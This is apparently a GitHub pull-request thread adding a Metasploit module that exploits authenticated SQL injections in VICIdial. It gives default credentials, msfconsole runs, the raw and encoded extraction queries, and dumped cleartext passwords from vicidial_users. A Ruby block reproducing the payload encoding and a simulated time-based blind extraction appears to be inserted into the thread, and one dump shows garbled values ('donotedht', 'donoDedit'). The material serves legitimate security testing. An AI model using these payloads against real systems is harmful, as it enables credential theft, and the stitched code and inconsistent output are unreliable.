
VICIdial Multiple SQLi (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878) #16732

Merged
merged 3 commits into from
Sep 22, 2022

Conversation

@h00die h00die commented Jun 30, 2022

This PR adds a module which exploits several authenticated sqli in VICIdial. Of note, two of the modules require a permissions change (vicibox sets admin permissions to near nothing, other than the ability to change permissions).

Verification

  • install vicibox (which includes vicidial and OS) per markdown instructions
  • Start msfconsole
  • use auxiliary/scanner/http/vicidial_multiple_sqli
  • set rhosts and password
  • run
  • Verify you get cleartext creds
  • Document looks good

@h00die h00die added the module label Jun 30, 2022
@smcintyre-r7 smcintyre-r7 marked this pull request as draft July 1, 2022 15:16
@smcintyre-r7

Drafted because this is a place holder and not ready for review.

h00die commented Jul 10, 2022

Setting up this software was.... an exercise in frustration. I know I kept step by step notes and module docs, but I can't seem to find them. I'm going to take a little time to find it again before making this ready for review

@h00die h00die changed the title VICIdial SQLi placeholder (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878) VICIdial Multiple SQLi (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878) Jul 10, 2022
bcoles commented Jul 10, 2022

> Setting up this software was.... an exercise in frustration. I know I kept step by step notes and module docs, but I can't seem to find them. I'm going to take a little time to find it again before making this ready for review

Maybe this will help:

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md

Also, GOautodial and VICIbox are available as an ISO and come with VICIdial installed by default. This makes testing much easier. Also, it would be worth testing the module on VICIbox and GOautodial anyway, as this is probably one of the most common methods of VICIdial deployment [citation needed].

@jheysel-r7

Hey @h00die, thanks for the contribution. Just wondering if you have any update on this? No worries if not. I might spin up one of the ISOs bcoles mentioned and give it a test if you think it's almost ready.

h00die commented Aug 5, 2022

I don't, been busy with life and prioritizing the VMware post module work over my own module stuff. If you want to try, go for it! If not it's ok to sit here another week or two so I can get VMware buttoned up and then write this up

@jheysel-r7 jheysel-r7 left a comment

No worries at all @h00die, just checking in. I gave it a test and put together some documentation. I tried pushing up the changes to a PR on your fork but got a permissions denied error - I was likely doing something incorrectly my apologies, so it's just included below.

During testing 2 of the 5 actions were failing while testing against ViciBox_v9. I'll investigate a bit further today:

List Users - access_recordings method      working
List Users - agent_time_sheet method       Testing of SQLi failed. 
List Users - agentcall_email method        working
List Users - modify_email_accounts method  working
List Users - user_stats method             Testing of SQLi failed.

This module exploits several authenticated SQL injection vulnerabilities in VICIdial 2.14b0.5 prior to
svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable)

Vulnerable Application

  1. Install the following OpenSUSE 10 ISO ViciBox_v9.x86_64-9.0.3.iso:
    1. Change the default password
    2. Set Timezone, Keyboard Layout and Language
    3. Network settings should autoconfigure (Tested on VMware Fusion). Network settings can be configured with the
      command yast lan if necessary
  2. Run vicibox-express to initiate the ViciDial Express Installation, everything can be kept as default
  3. Navigate to http://<ip-address>/
    1. Click Administration and login with default credentials username: 6666, password: 1234
    2. Once logged in, Click "Finish setup". Everything can be kept as default.
  4. The complete list of setup instructions can be found by following this link

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/scanner/http/vicidial_multiple_sqli
  3. Do: set username <username>
  4. Do: set password <password>
  5. Do show actions
    1. Select from the list or keep the default
  6. Do: run
  7. The module will exploit the selected SQL injection and return the extracted usernames and passwords

Scenarios

ViciBox_v9.x86_64-9.0.3 using the List Users - modify_email_accounts method:

msf6 > use auxiliary/scanner/http/vicidial_multiple_sqli
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
password => notpassword
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
action => List Users - modify_email_accounts method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[*] {SQLi} Executing (select group_concat(TXMlUAF) from (select cast(concat_ws(';',ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
[*] {SQLi} Encoded to (select group_concat(TXMlUAF) from (select cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0))) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
[*] {SQLi} Time-based injection: expecting output of length 46
[!] No active DB -- Credential data will not be saved!
[+] Dumped table contents:
vicidial_users
==============

user  pass
----  ----
6666  notpassword
VDAD  donotedit
VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
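
The two {SQLi} lines in the verbose output above (the raw extraction query and its quote-free encoding) and the "expecting output of length 46" line can be reproduced with the Ruby below. It is an added illustration, not code from the Metasploit module, its SQLi library, or VICIdial. The three rows are constructed to match the dump, the pad bytes 0x87/0x52 are fixed as an assumption so the encoding is deterministic (the real library picks random bytes), and the time-based oracle is simulated locally: a real one would inject something like if(<cond>,sleep(N),0) into the vulnerable parameter and time the HTTP response.

```ruby
# Added illustration; not code from the Metasploit module or from VICIdial.
# The rows below are constructed to match the dump shown in the PR.
USERS = [
  ['6666', 'notpassword'],
  ['VDAD', 'donotedit'],
  ['VDCL', 'donotedit'],
].freeze

# Result of the inner query in the verbose output: concat_ws(';', user, pass)
# per row, then group_concat (default separator ','). Three rows give 46 bytes.
def group_concat_users(rows, limit = 3)
  rows.first(limit).map { |user, pass| "#{user};#{pass}" }.join(',')
end

# Quote-free encoding as shown on the "Encoded to" line: a non-empty string
# literal becomes a hex literal (';' -> 0x3b) and the empty string becomes
# repeat(0xNN,0), so the payload contains no quote characters. pad_bytes is an
# assumption made here for determinism; the real library picks random bytes.
def encode_quote_free(sql, pad_bytes: [0x87, 0x52])
  pads = pad_bytes.cycle
  sql.gsub(/'([^']*)'/) do
    literal = Regexp.last_match(1)
    literal.empty? ? format('repeat(0x%02x,0)', pads.next) : "0x#{literal.unpack1('H*')}"
  end
end

# Local stand-in for a time-based blind oracle. A real one would inject
# if(<cond>,sleep(N),0) and treat a slow response as "true"; here the answer
# comes from the secret directly. Returns the oracle and a request counter.
def make_oracle(secret)
  requests = 0
  oracle = lambda do |cond|
    requests += 1
    case cond[:kind]
    when :length then secret.bytesize > cond[:gt]
    when :byte   then secret.getbyte(cond[:pos]) > cond[:gt]
    else raise ArgumentError, "unknown condition #{cond[:kind]}"
    end
  end
  [oracle, -> { requests }]
end

# Binary search over 0..max for the value x: the oracle answers "x > mid"
# true below x and false at or above it (about log2(max) requests).
def bsearch_value(max)
  lo = 0
  hi = max
  while lo < hi
    mid = (lo + hi) / 2
    if yield(mid)
      lo = mid + 1
    else
      hi = mid
    end
  end
  lo
end

# Time-based extraction: learn the output length first (the "expecting output
# of length 46" step), then recover each byte with its own binary search.
def extract_blind(oracle, max_len: 1024)
  length = bsearch_value(max_len) { |v| oracle.call(kind: :length, gt: v) }
  bytes = (0...length).map do |pos|
    bsearch_value(255) { |v| oracle.call(kind: :byte, pos: pos, gt: v) }
  end
  [length, bytes.pack('C*').force_encoding(Encoding::UTF_8)]
end

if __FILE__ == $PROGRAM_NAME
  query = "select group_concat(TXMlUAF) from (select cast(concat_ws(';'," \
          "ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn"
  puts "Encoded to #{encode_quote_free(query)}"
  secret = group_concat_users(USERS)
  oracle, requests = make_oracle(secret)
  length, recovered = extract_blind(oracle)
  puts "expected output length #{length}, recovered in #{requests.call} requests: #{recovered}"
end
```

The request count is the practical point: with a 46-byte result the extraction needs roughly 11 requests for the length plus 8 per byte, so a single time-based action costs a few hundred delayed requests, which is why the module reports the expected length before it starts pulling bytes.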

jheysel-r7 commented Aug 9, 2022

> > Setting up this software was.... an exercise in frustration. I know I kept step by step notes and module docs, but I can't seem to find them. I'm going to take a little time to find it again before making this ready for review
>
> Maybe this will help:
>
> https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md
>
> Also, GOautodial and VICIbox are available as an ISO and come with VICIdial installed by default. This makes testing much easier. Also, it would be worth testing the module on VICIbox and GOautodial anyway, as this is probably one of the most common methods of VICIdial deployment [citation needed].

Thanks for mentioning this bcoles. @h00die for transparency I installed and setup GOautodial and the module as it's written is unable to authenticate with the application. The login URI's and authentication requirements are a bit different.

Edit: Not sure if you'll want to investigate this further. If you do, when installing GOautodial this link is useful. If not, outlining what this module has been tested on and what it is intended to work on might be sufficient.

h00die commented Aug 10, 2022

not surprising about GOautodial using a different url structure. My schedule is freeing up, hoping to restart this and get it finished soon.

I used ViciBox_v10.x86_64-10.0.0.iso, not 9, so that may account for some of the modules not working as new features may have been added. When I work on the doc, i'll do 9 and 10 at the same time.

vicidial sqli module

first run of docs

updates to vicidial
h00die commented Aug 14, 2022

I think I remember vicidial being a pain because I was testing each page and API endpoint. The exploitable ones in here actually required little to nothing to setup and exploit.

h00die commented Aug 14, 2022

Tested against 9.0.3 and 10.0.0, added docs, ready for real review! Also did a rebase

@h00die h00die marked this pull request as ready for review August 14, 2022 12:50
h00die commented Sep 3, 2022

ping @jheysel-r7 just wanted to check if you'd have time to get back around to this one

@jheysel-r7 jheysel-r7 left a comment

Thanks @h00die! Great module. Tested and everything looks good. I ran ruby tools/dev/msftidy_docs.rb documentation/modules/auxiliary/scanner/http/vicidial_multiple_sqli.md and made a couple of minor suggestions based on the output.

msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - access_recordings method
action => List Users - access_recordings method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedit
 VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agent_time_sheet method
action => List Users - agent_time_sheet method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedit
 VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agentcall_email method
action => List Users - agentcall_email method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedit
 VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
action => List Users - modify_email_accounts method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedht
 VDCL  donoDedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - user_stats method
action => List Users - user_stats method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run

[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============

 user  pass
 ----  ----
 6666  notpassword
 VDAD  donotedit
 VDCL  donotedit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

h00die commented Sep 21, 2022

addressed the comments, retested on my side, should be good to ship!

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 22, 2022
@jheysel-r7 jheysel-r7 merged commit 12f3325 into rapid7:master Sep 22, 2022
@jheysel-r7

Release Notes

This PR adds a module which exploits several authenticated sqli in VICIdial (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878)

@h00die h00die deleted the vicidial branch September 23, 2022 21:27
Labels: docs, module, rn-modules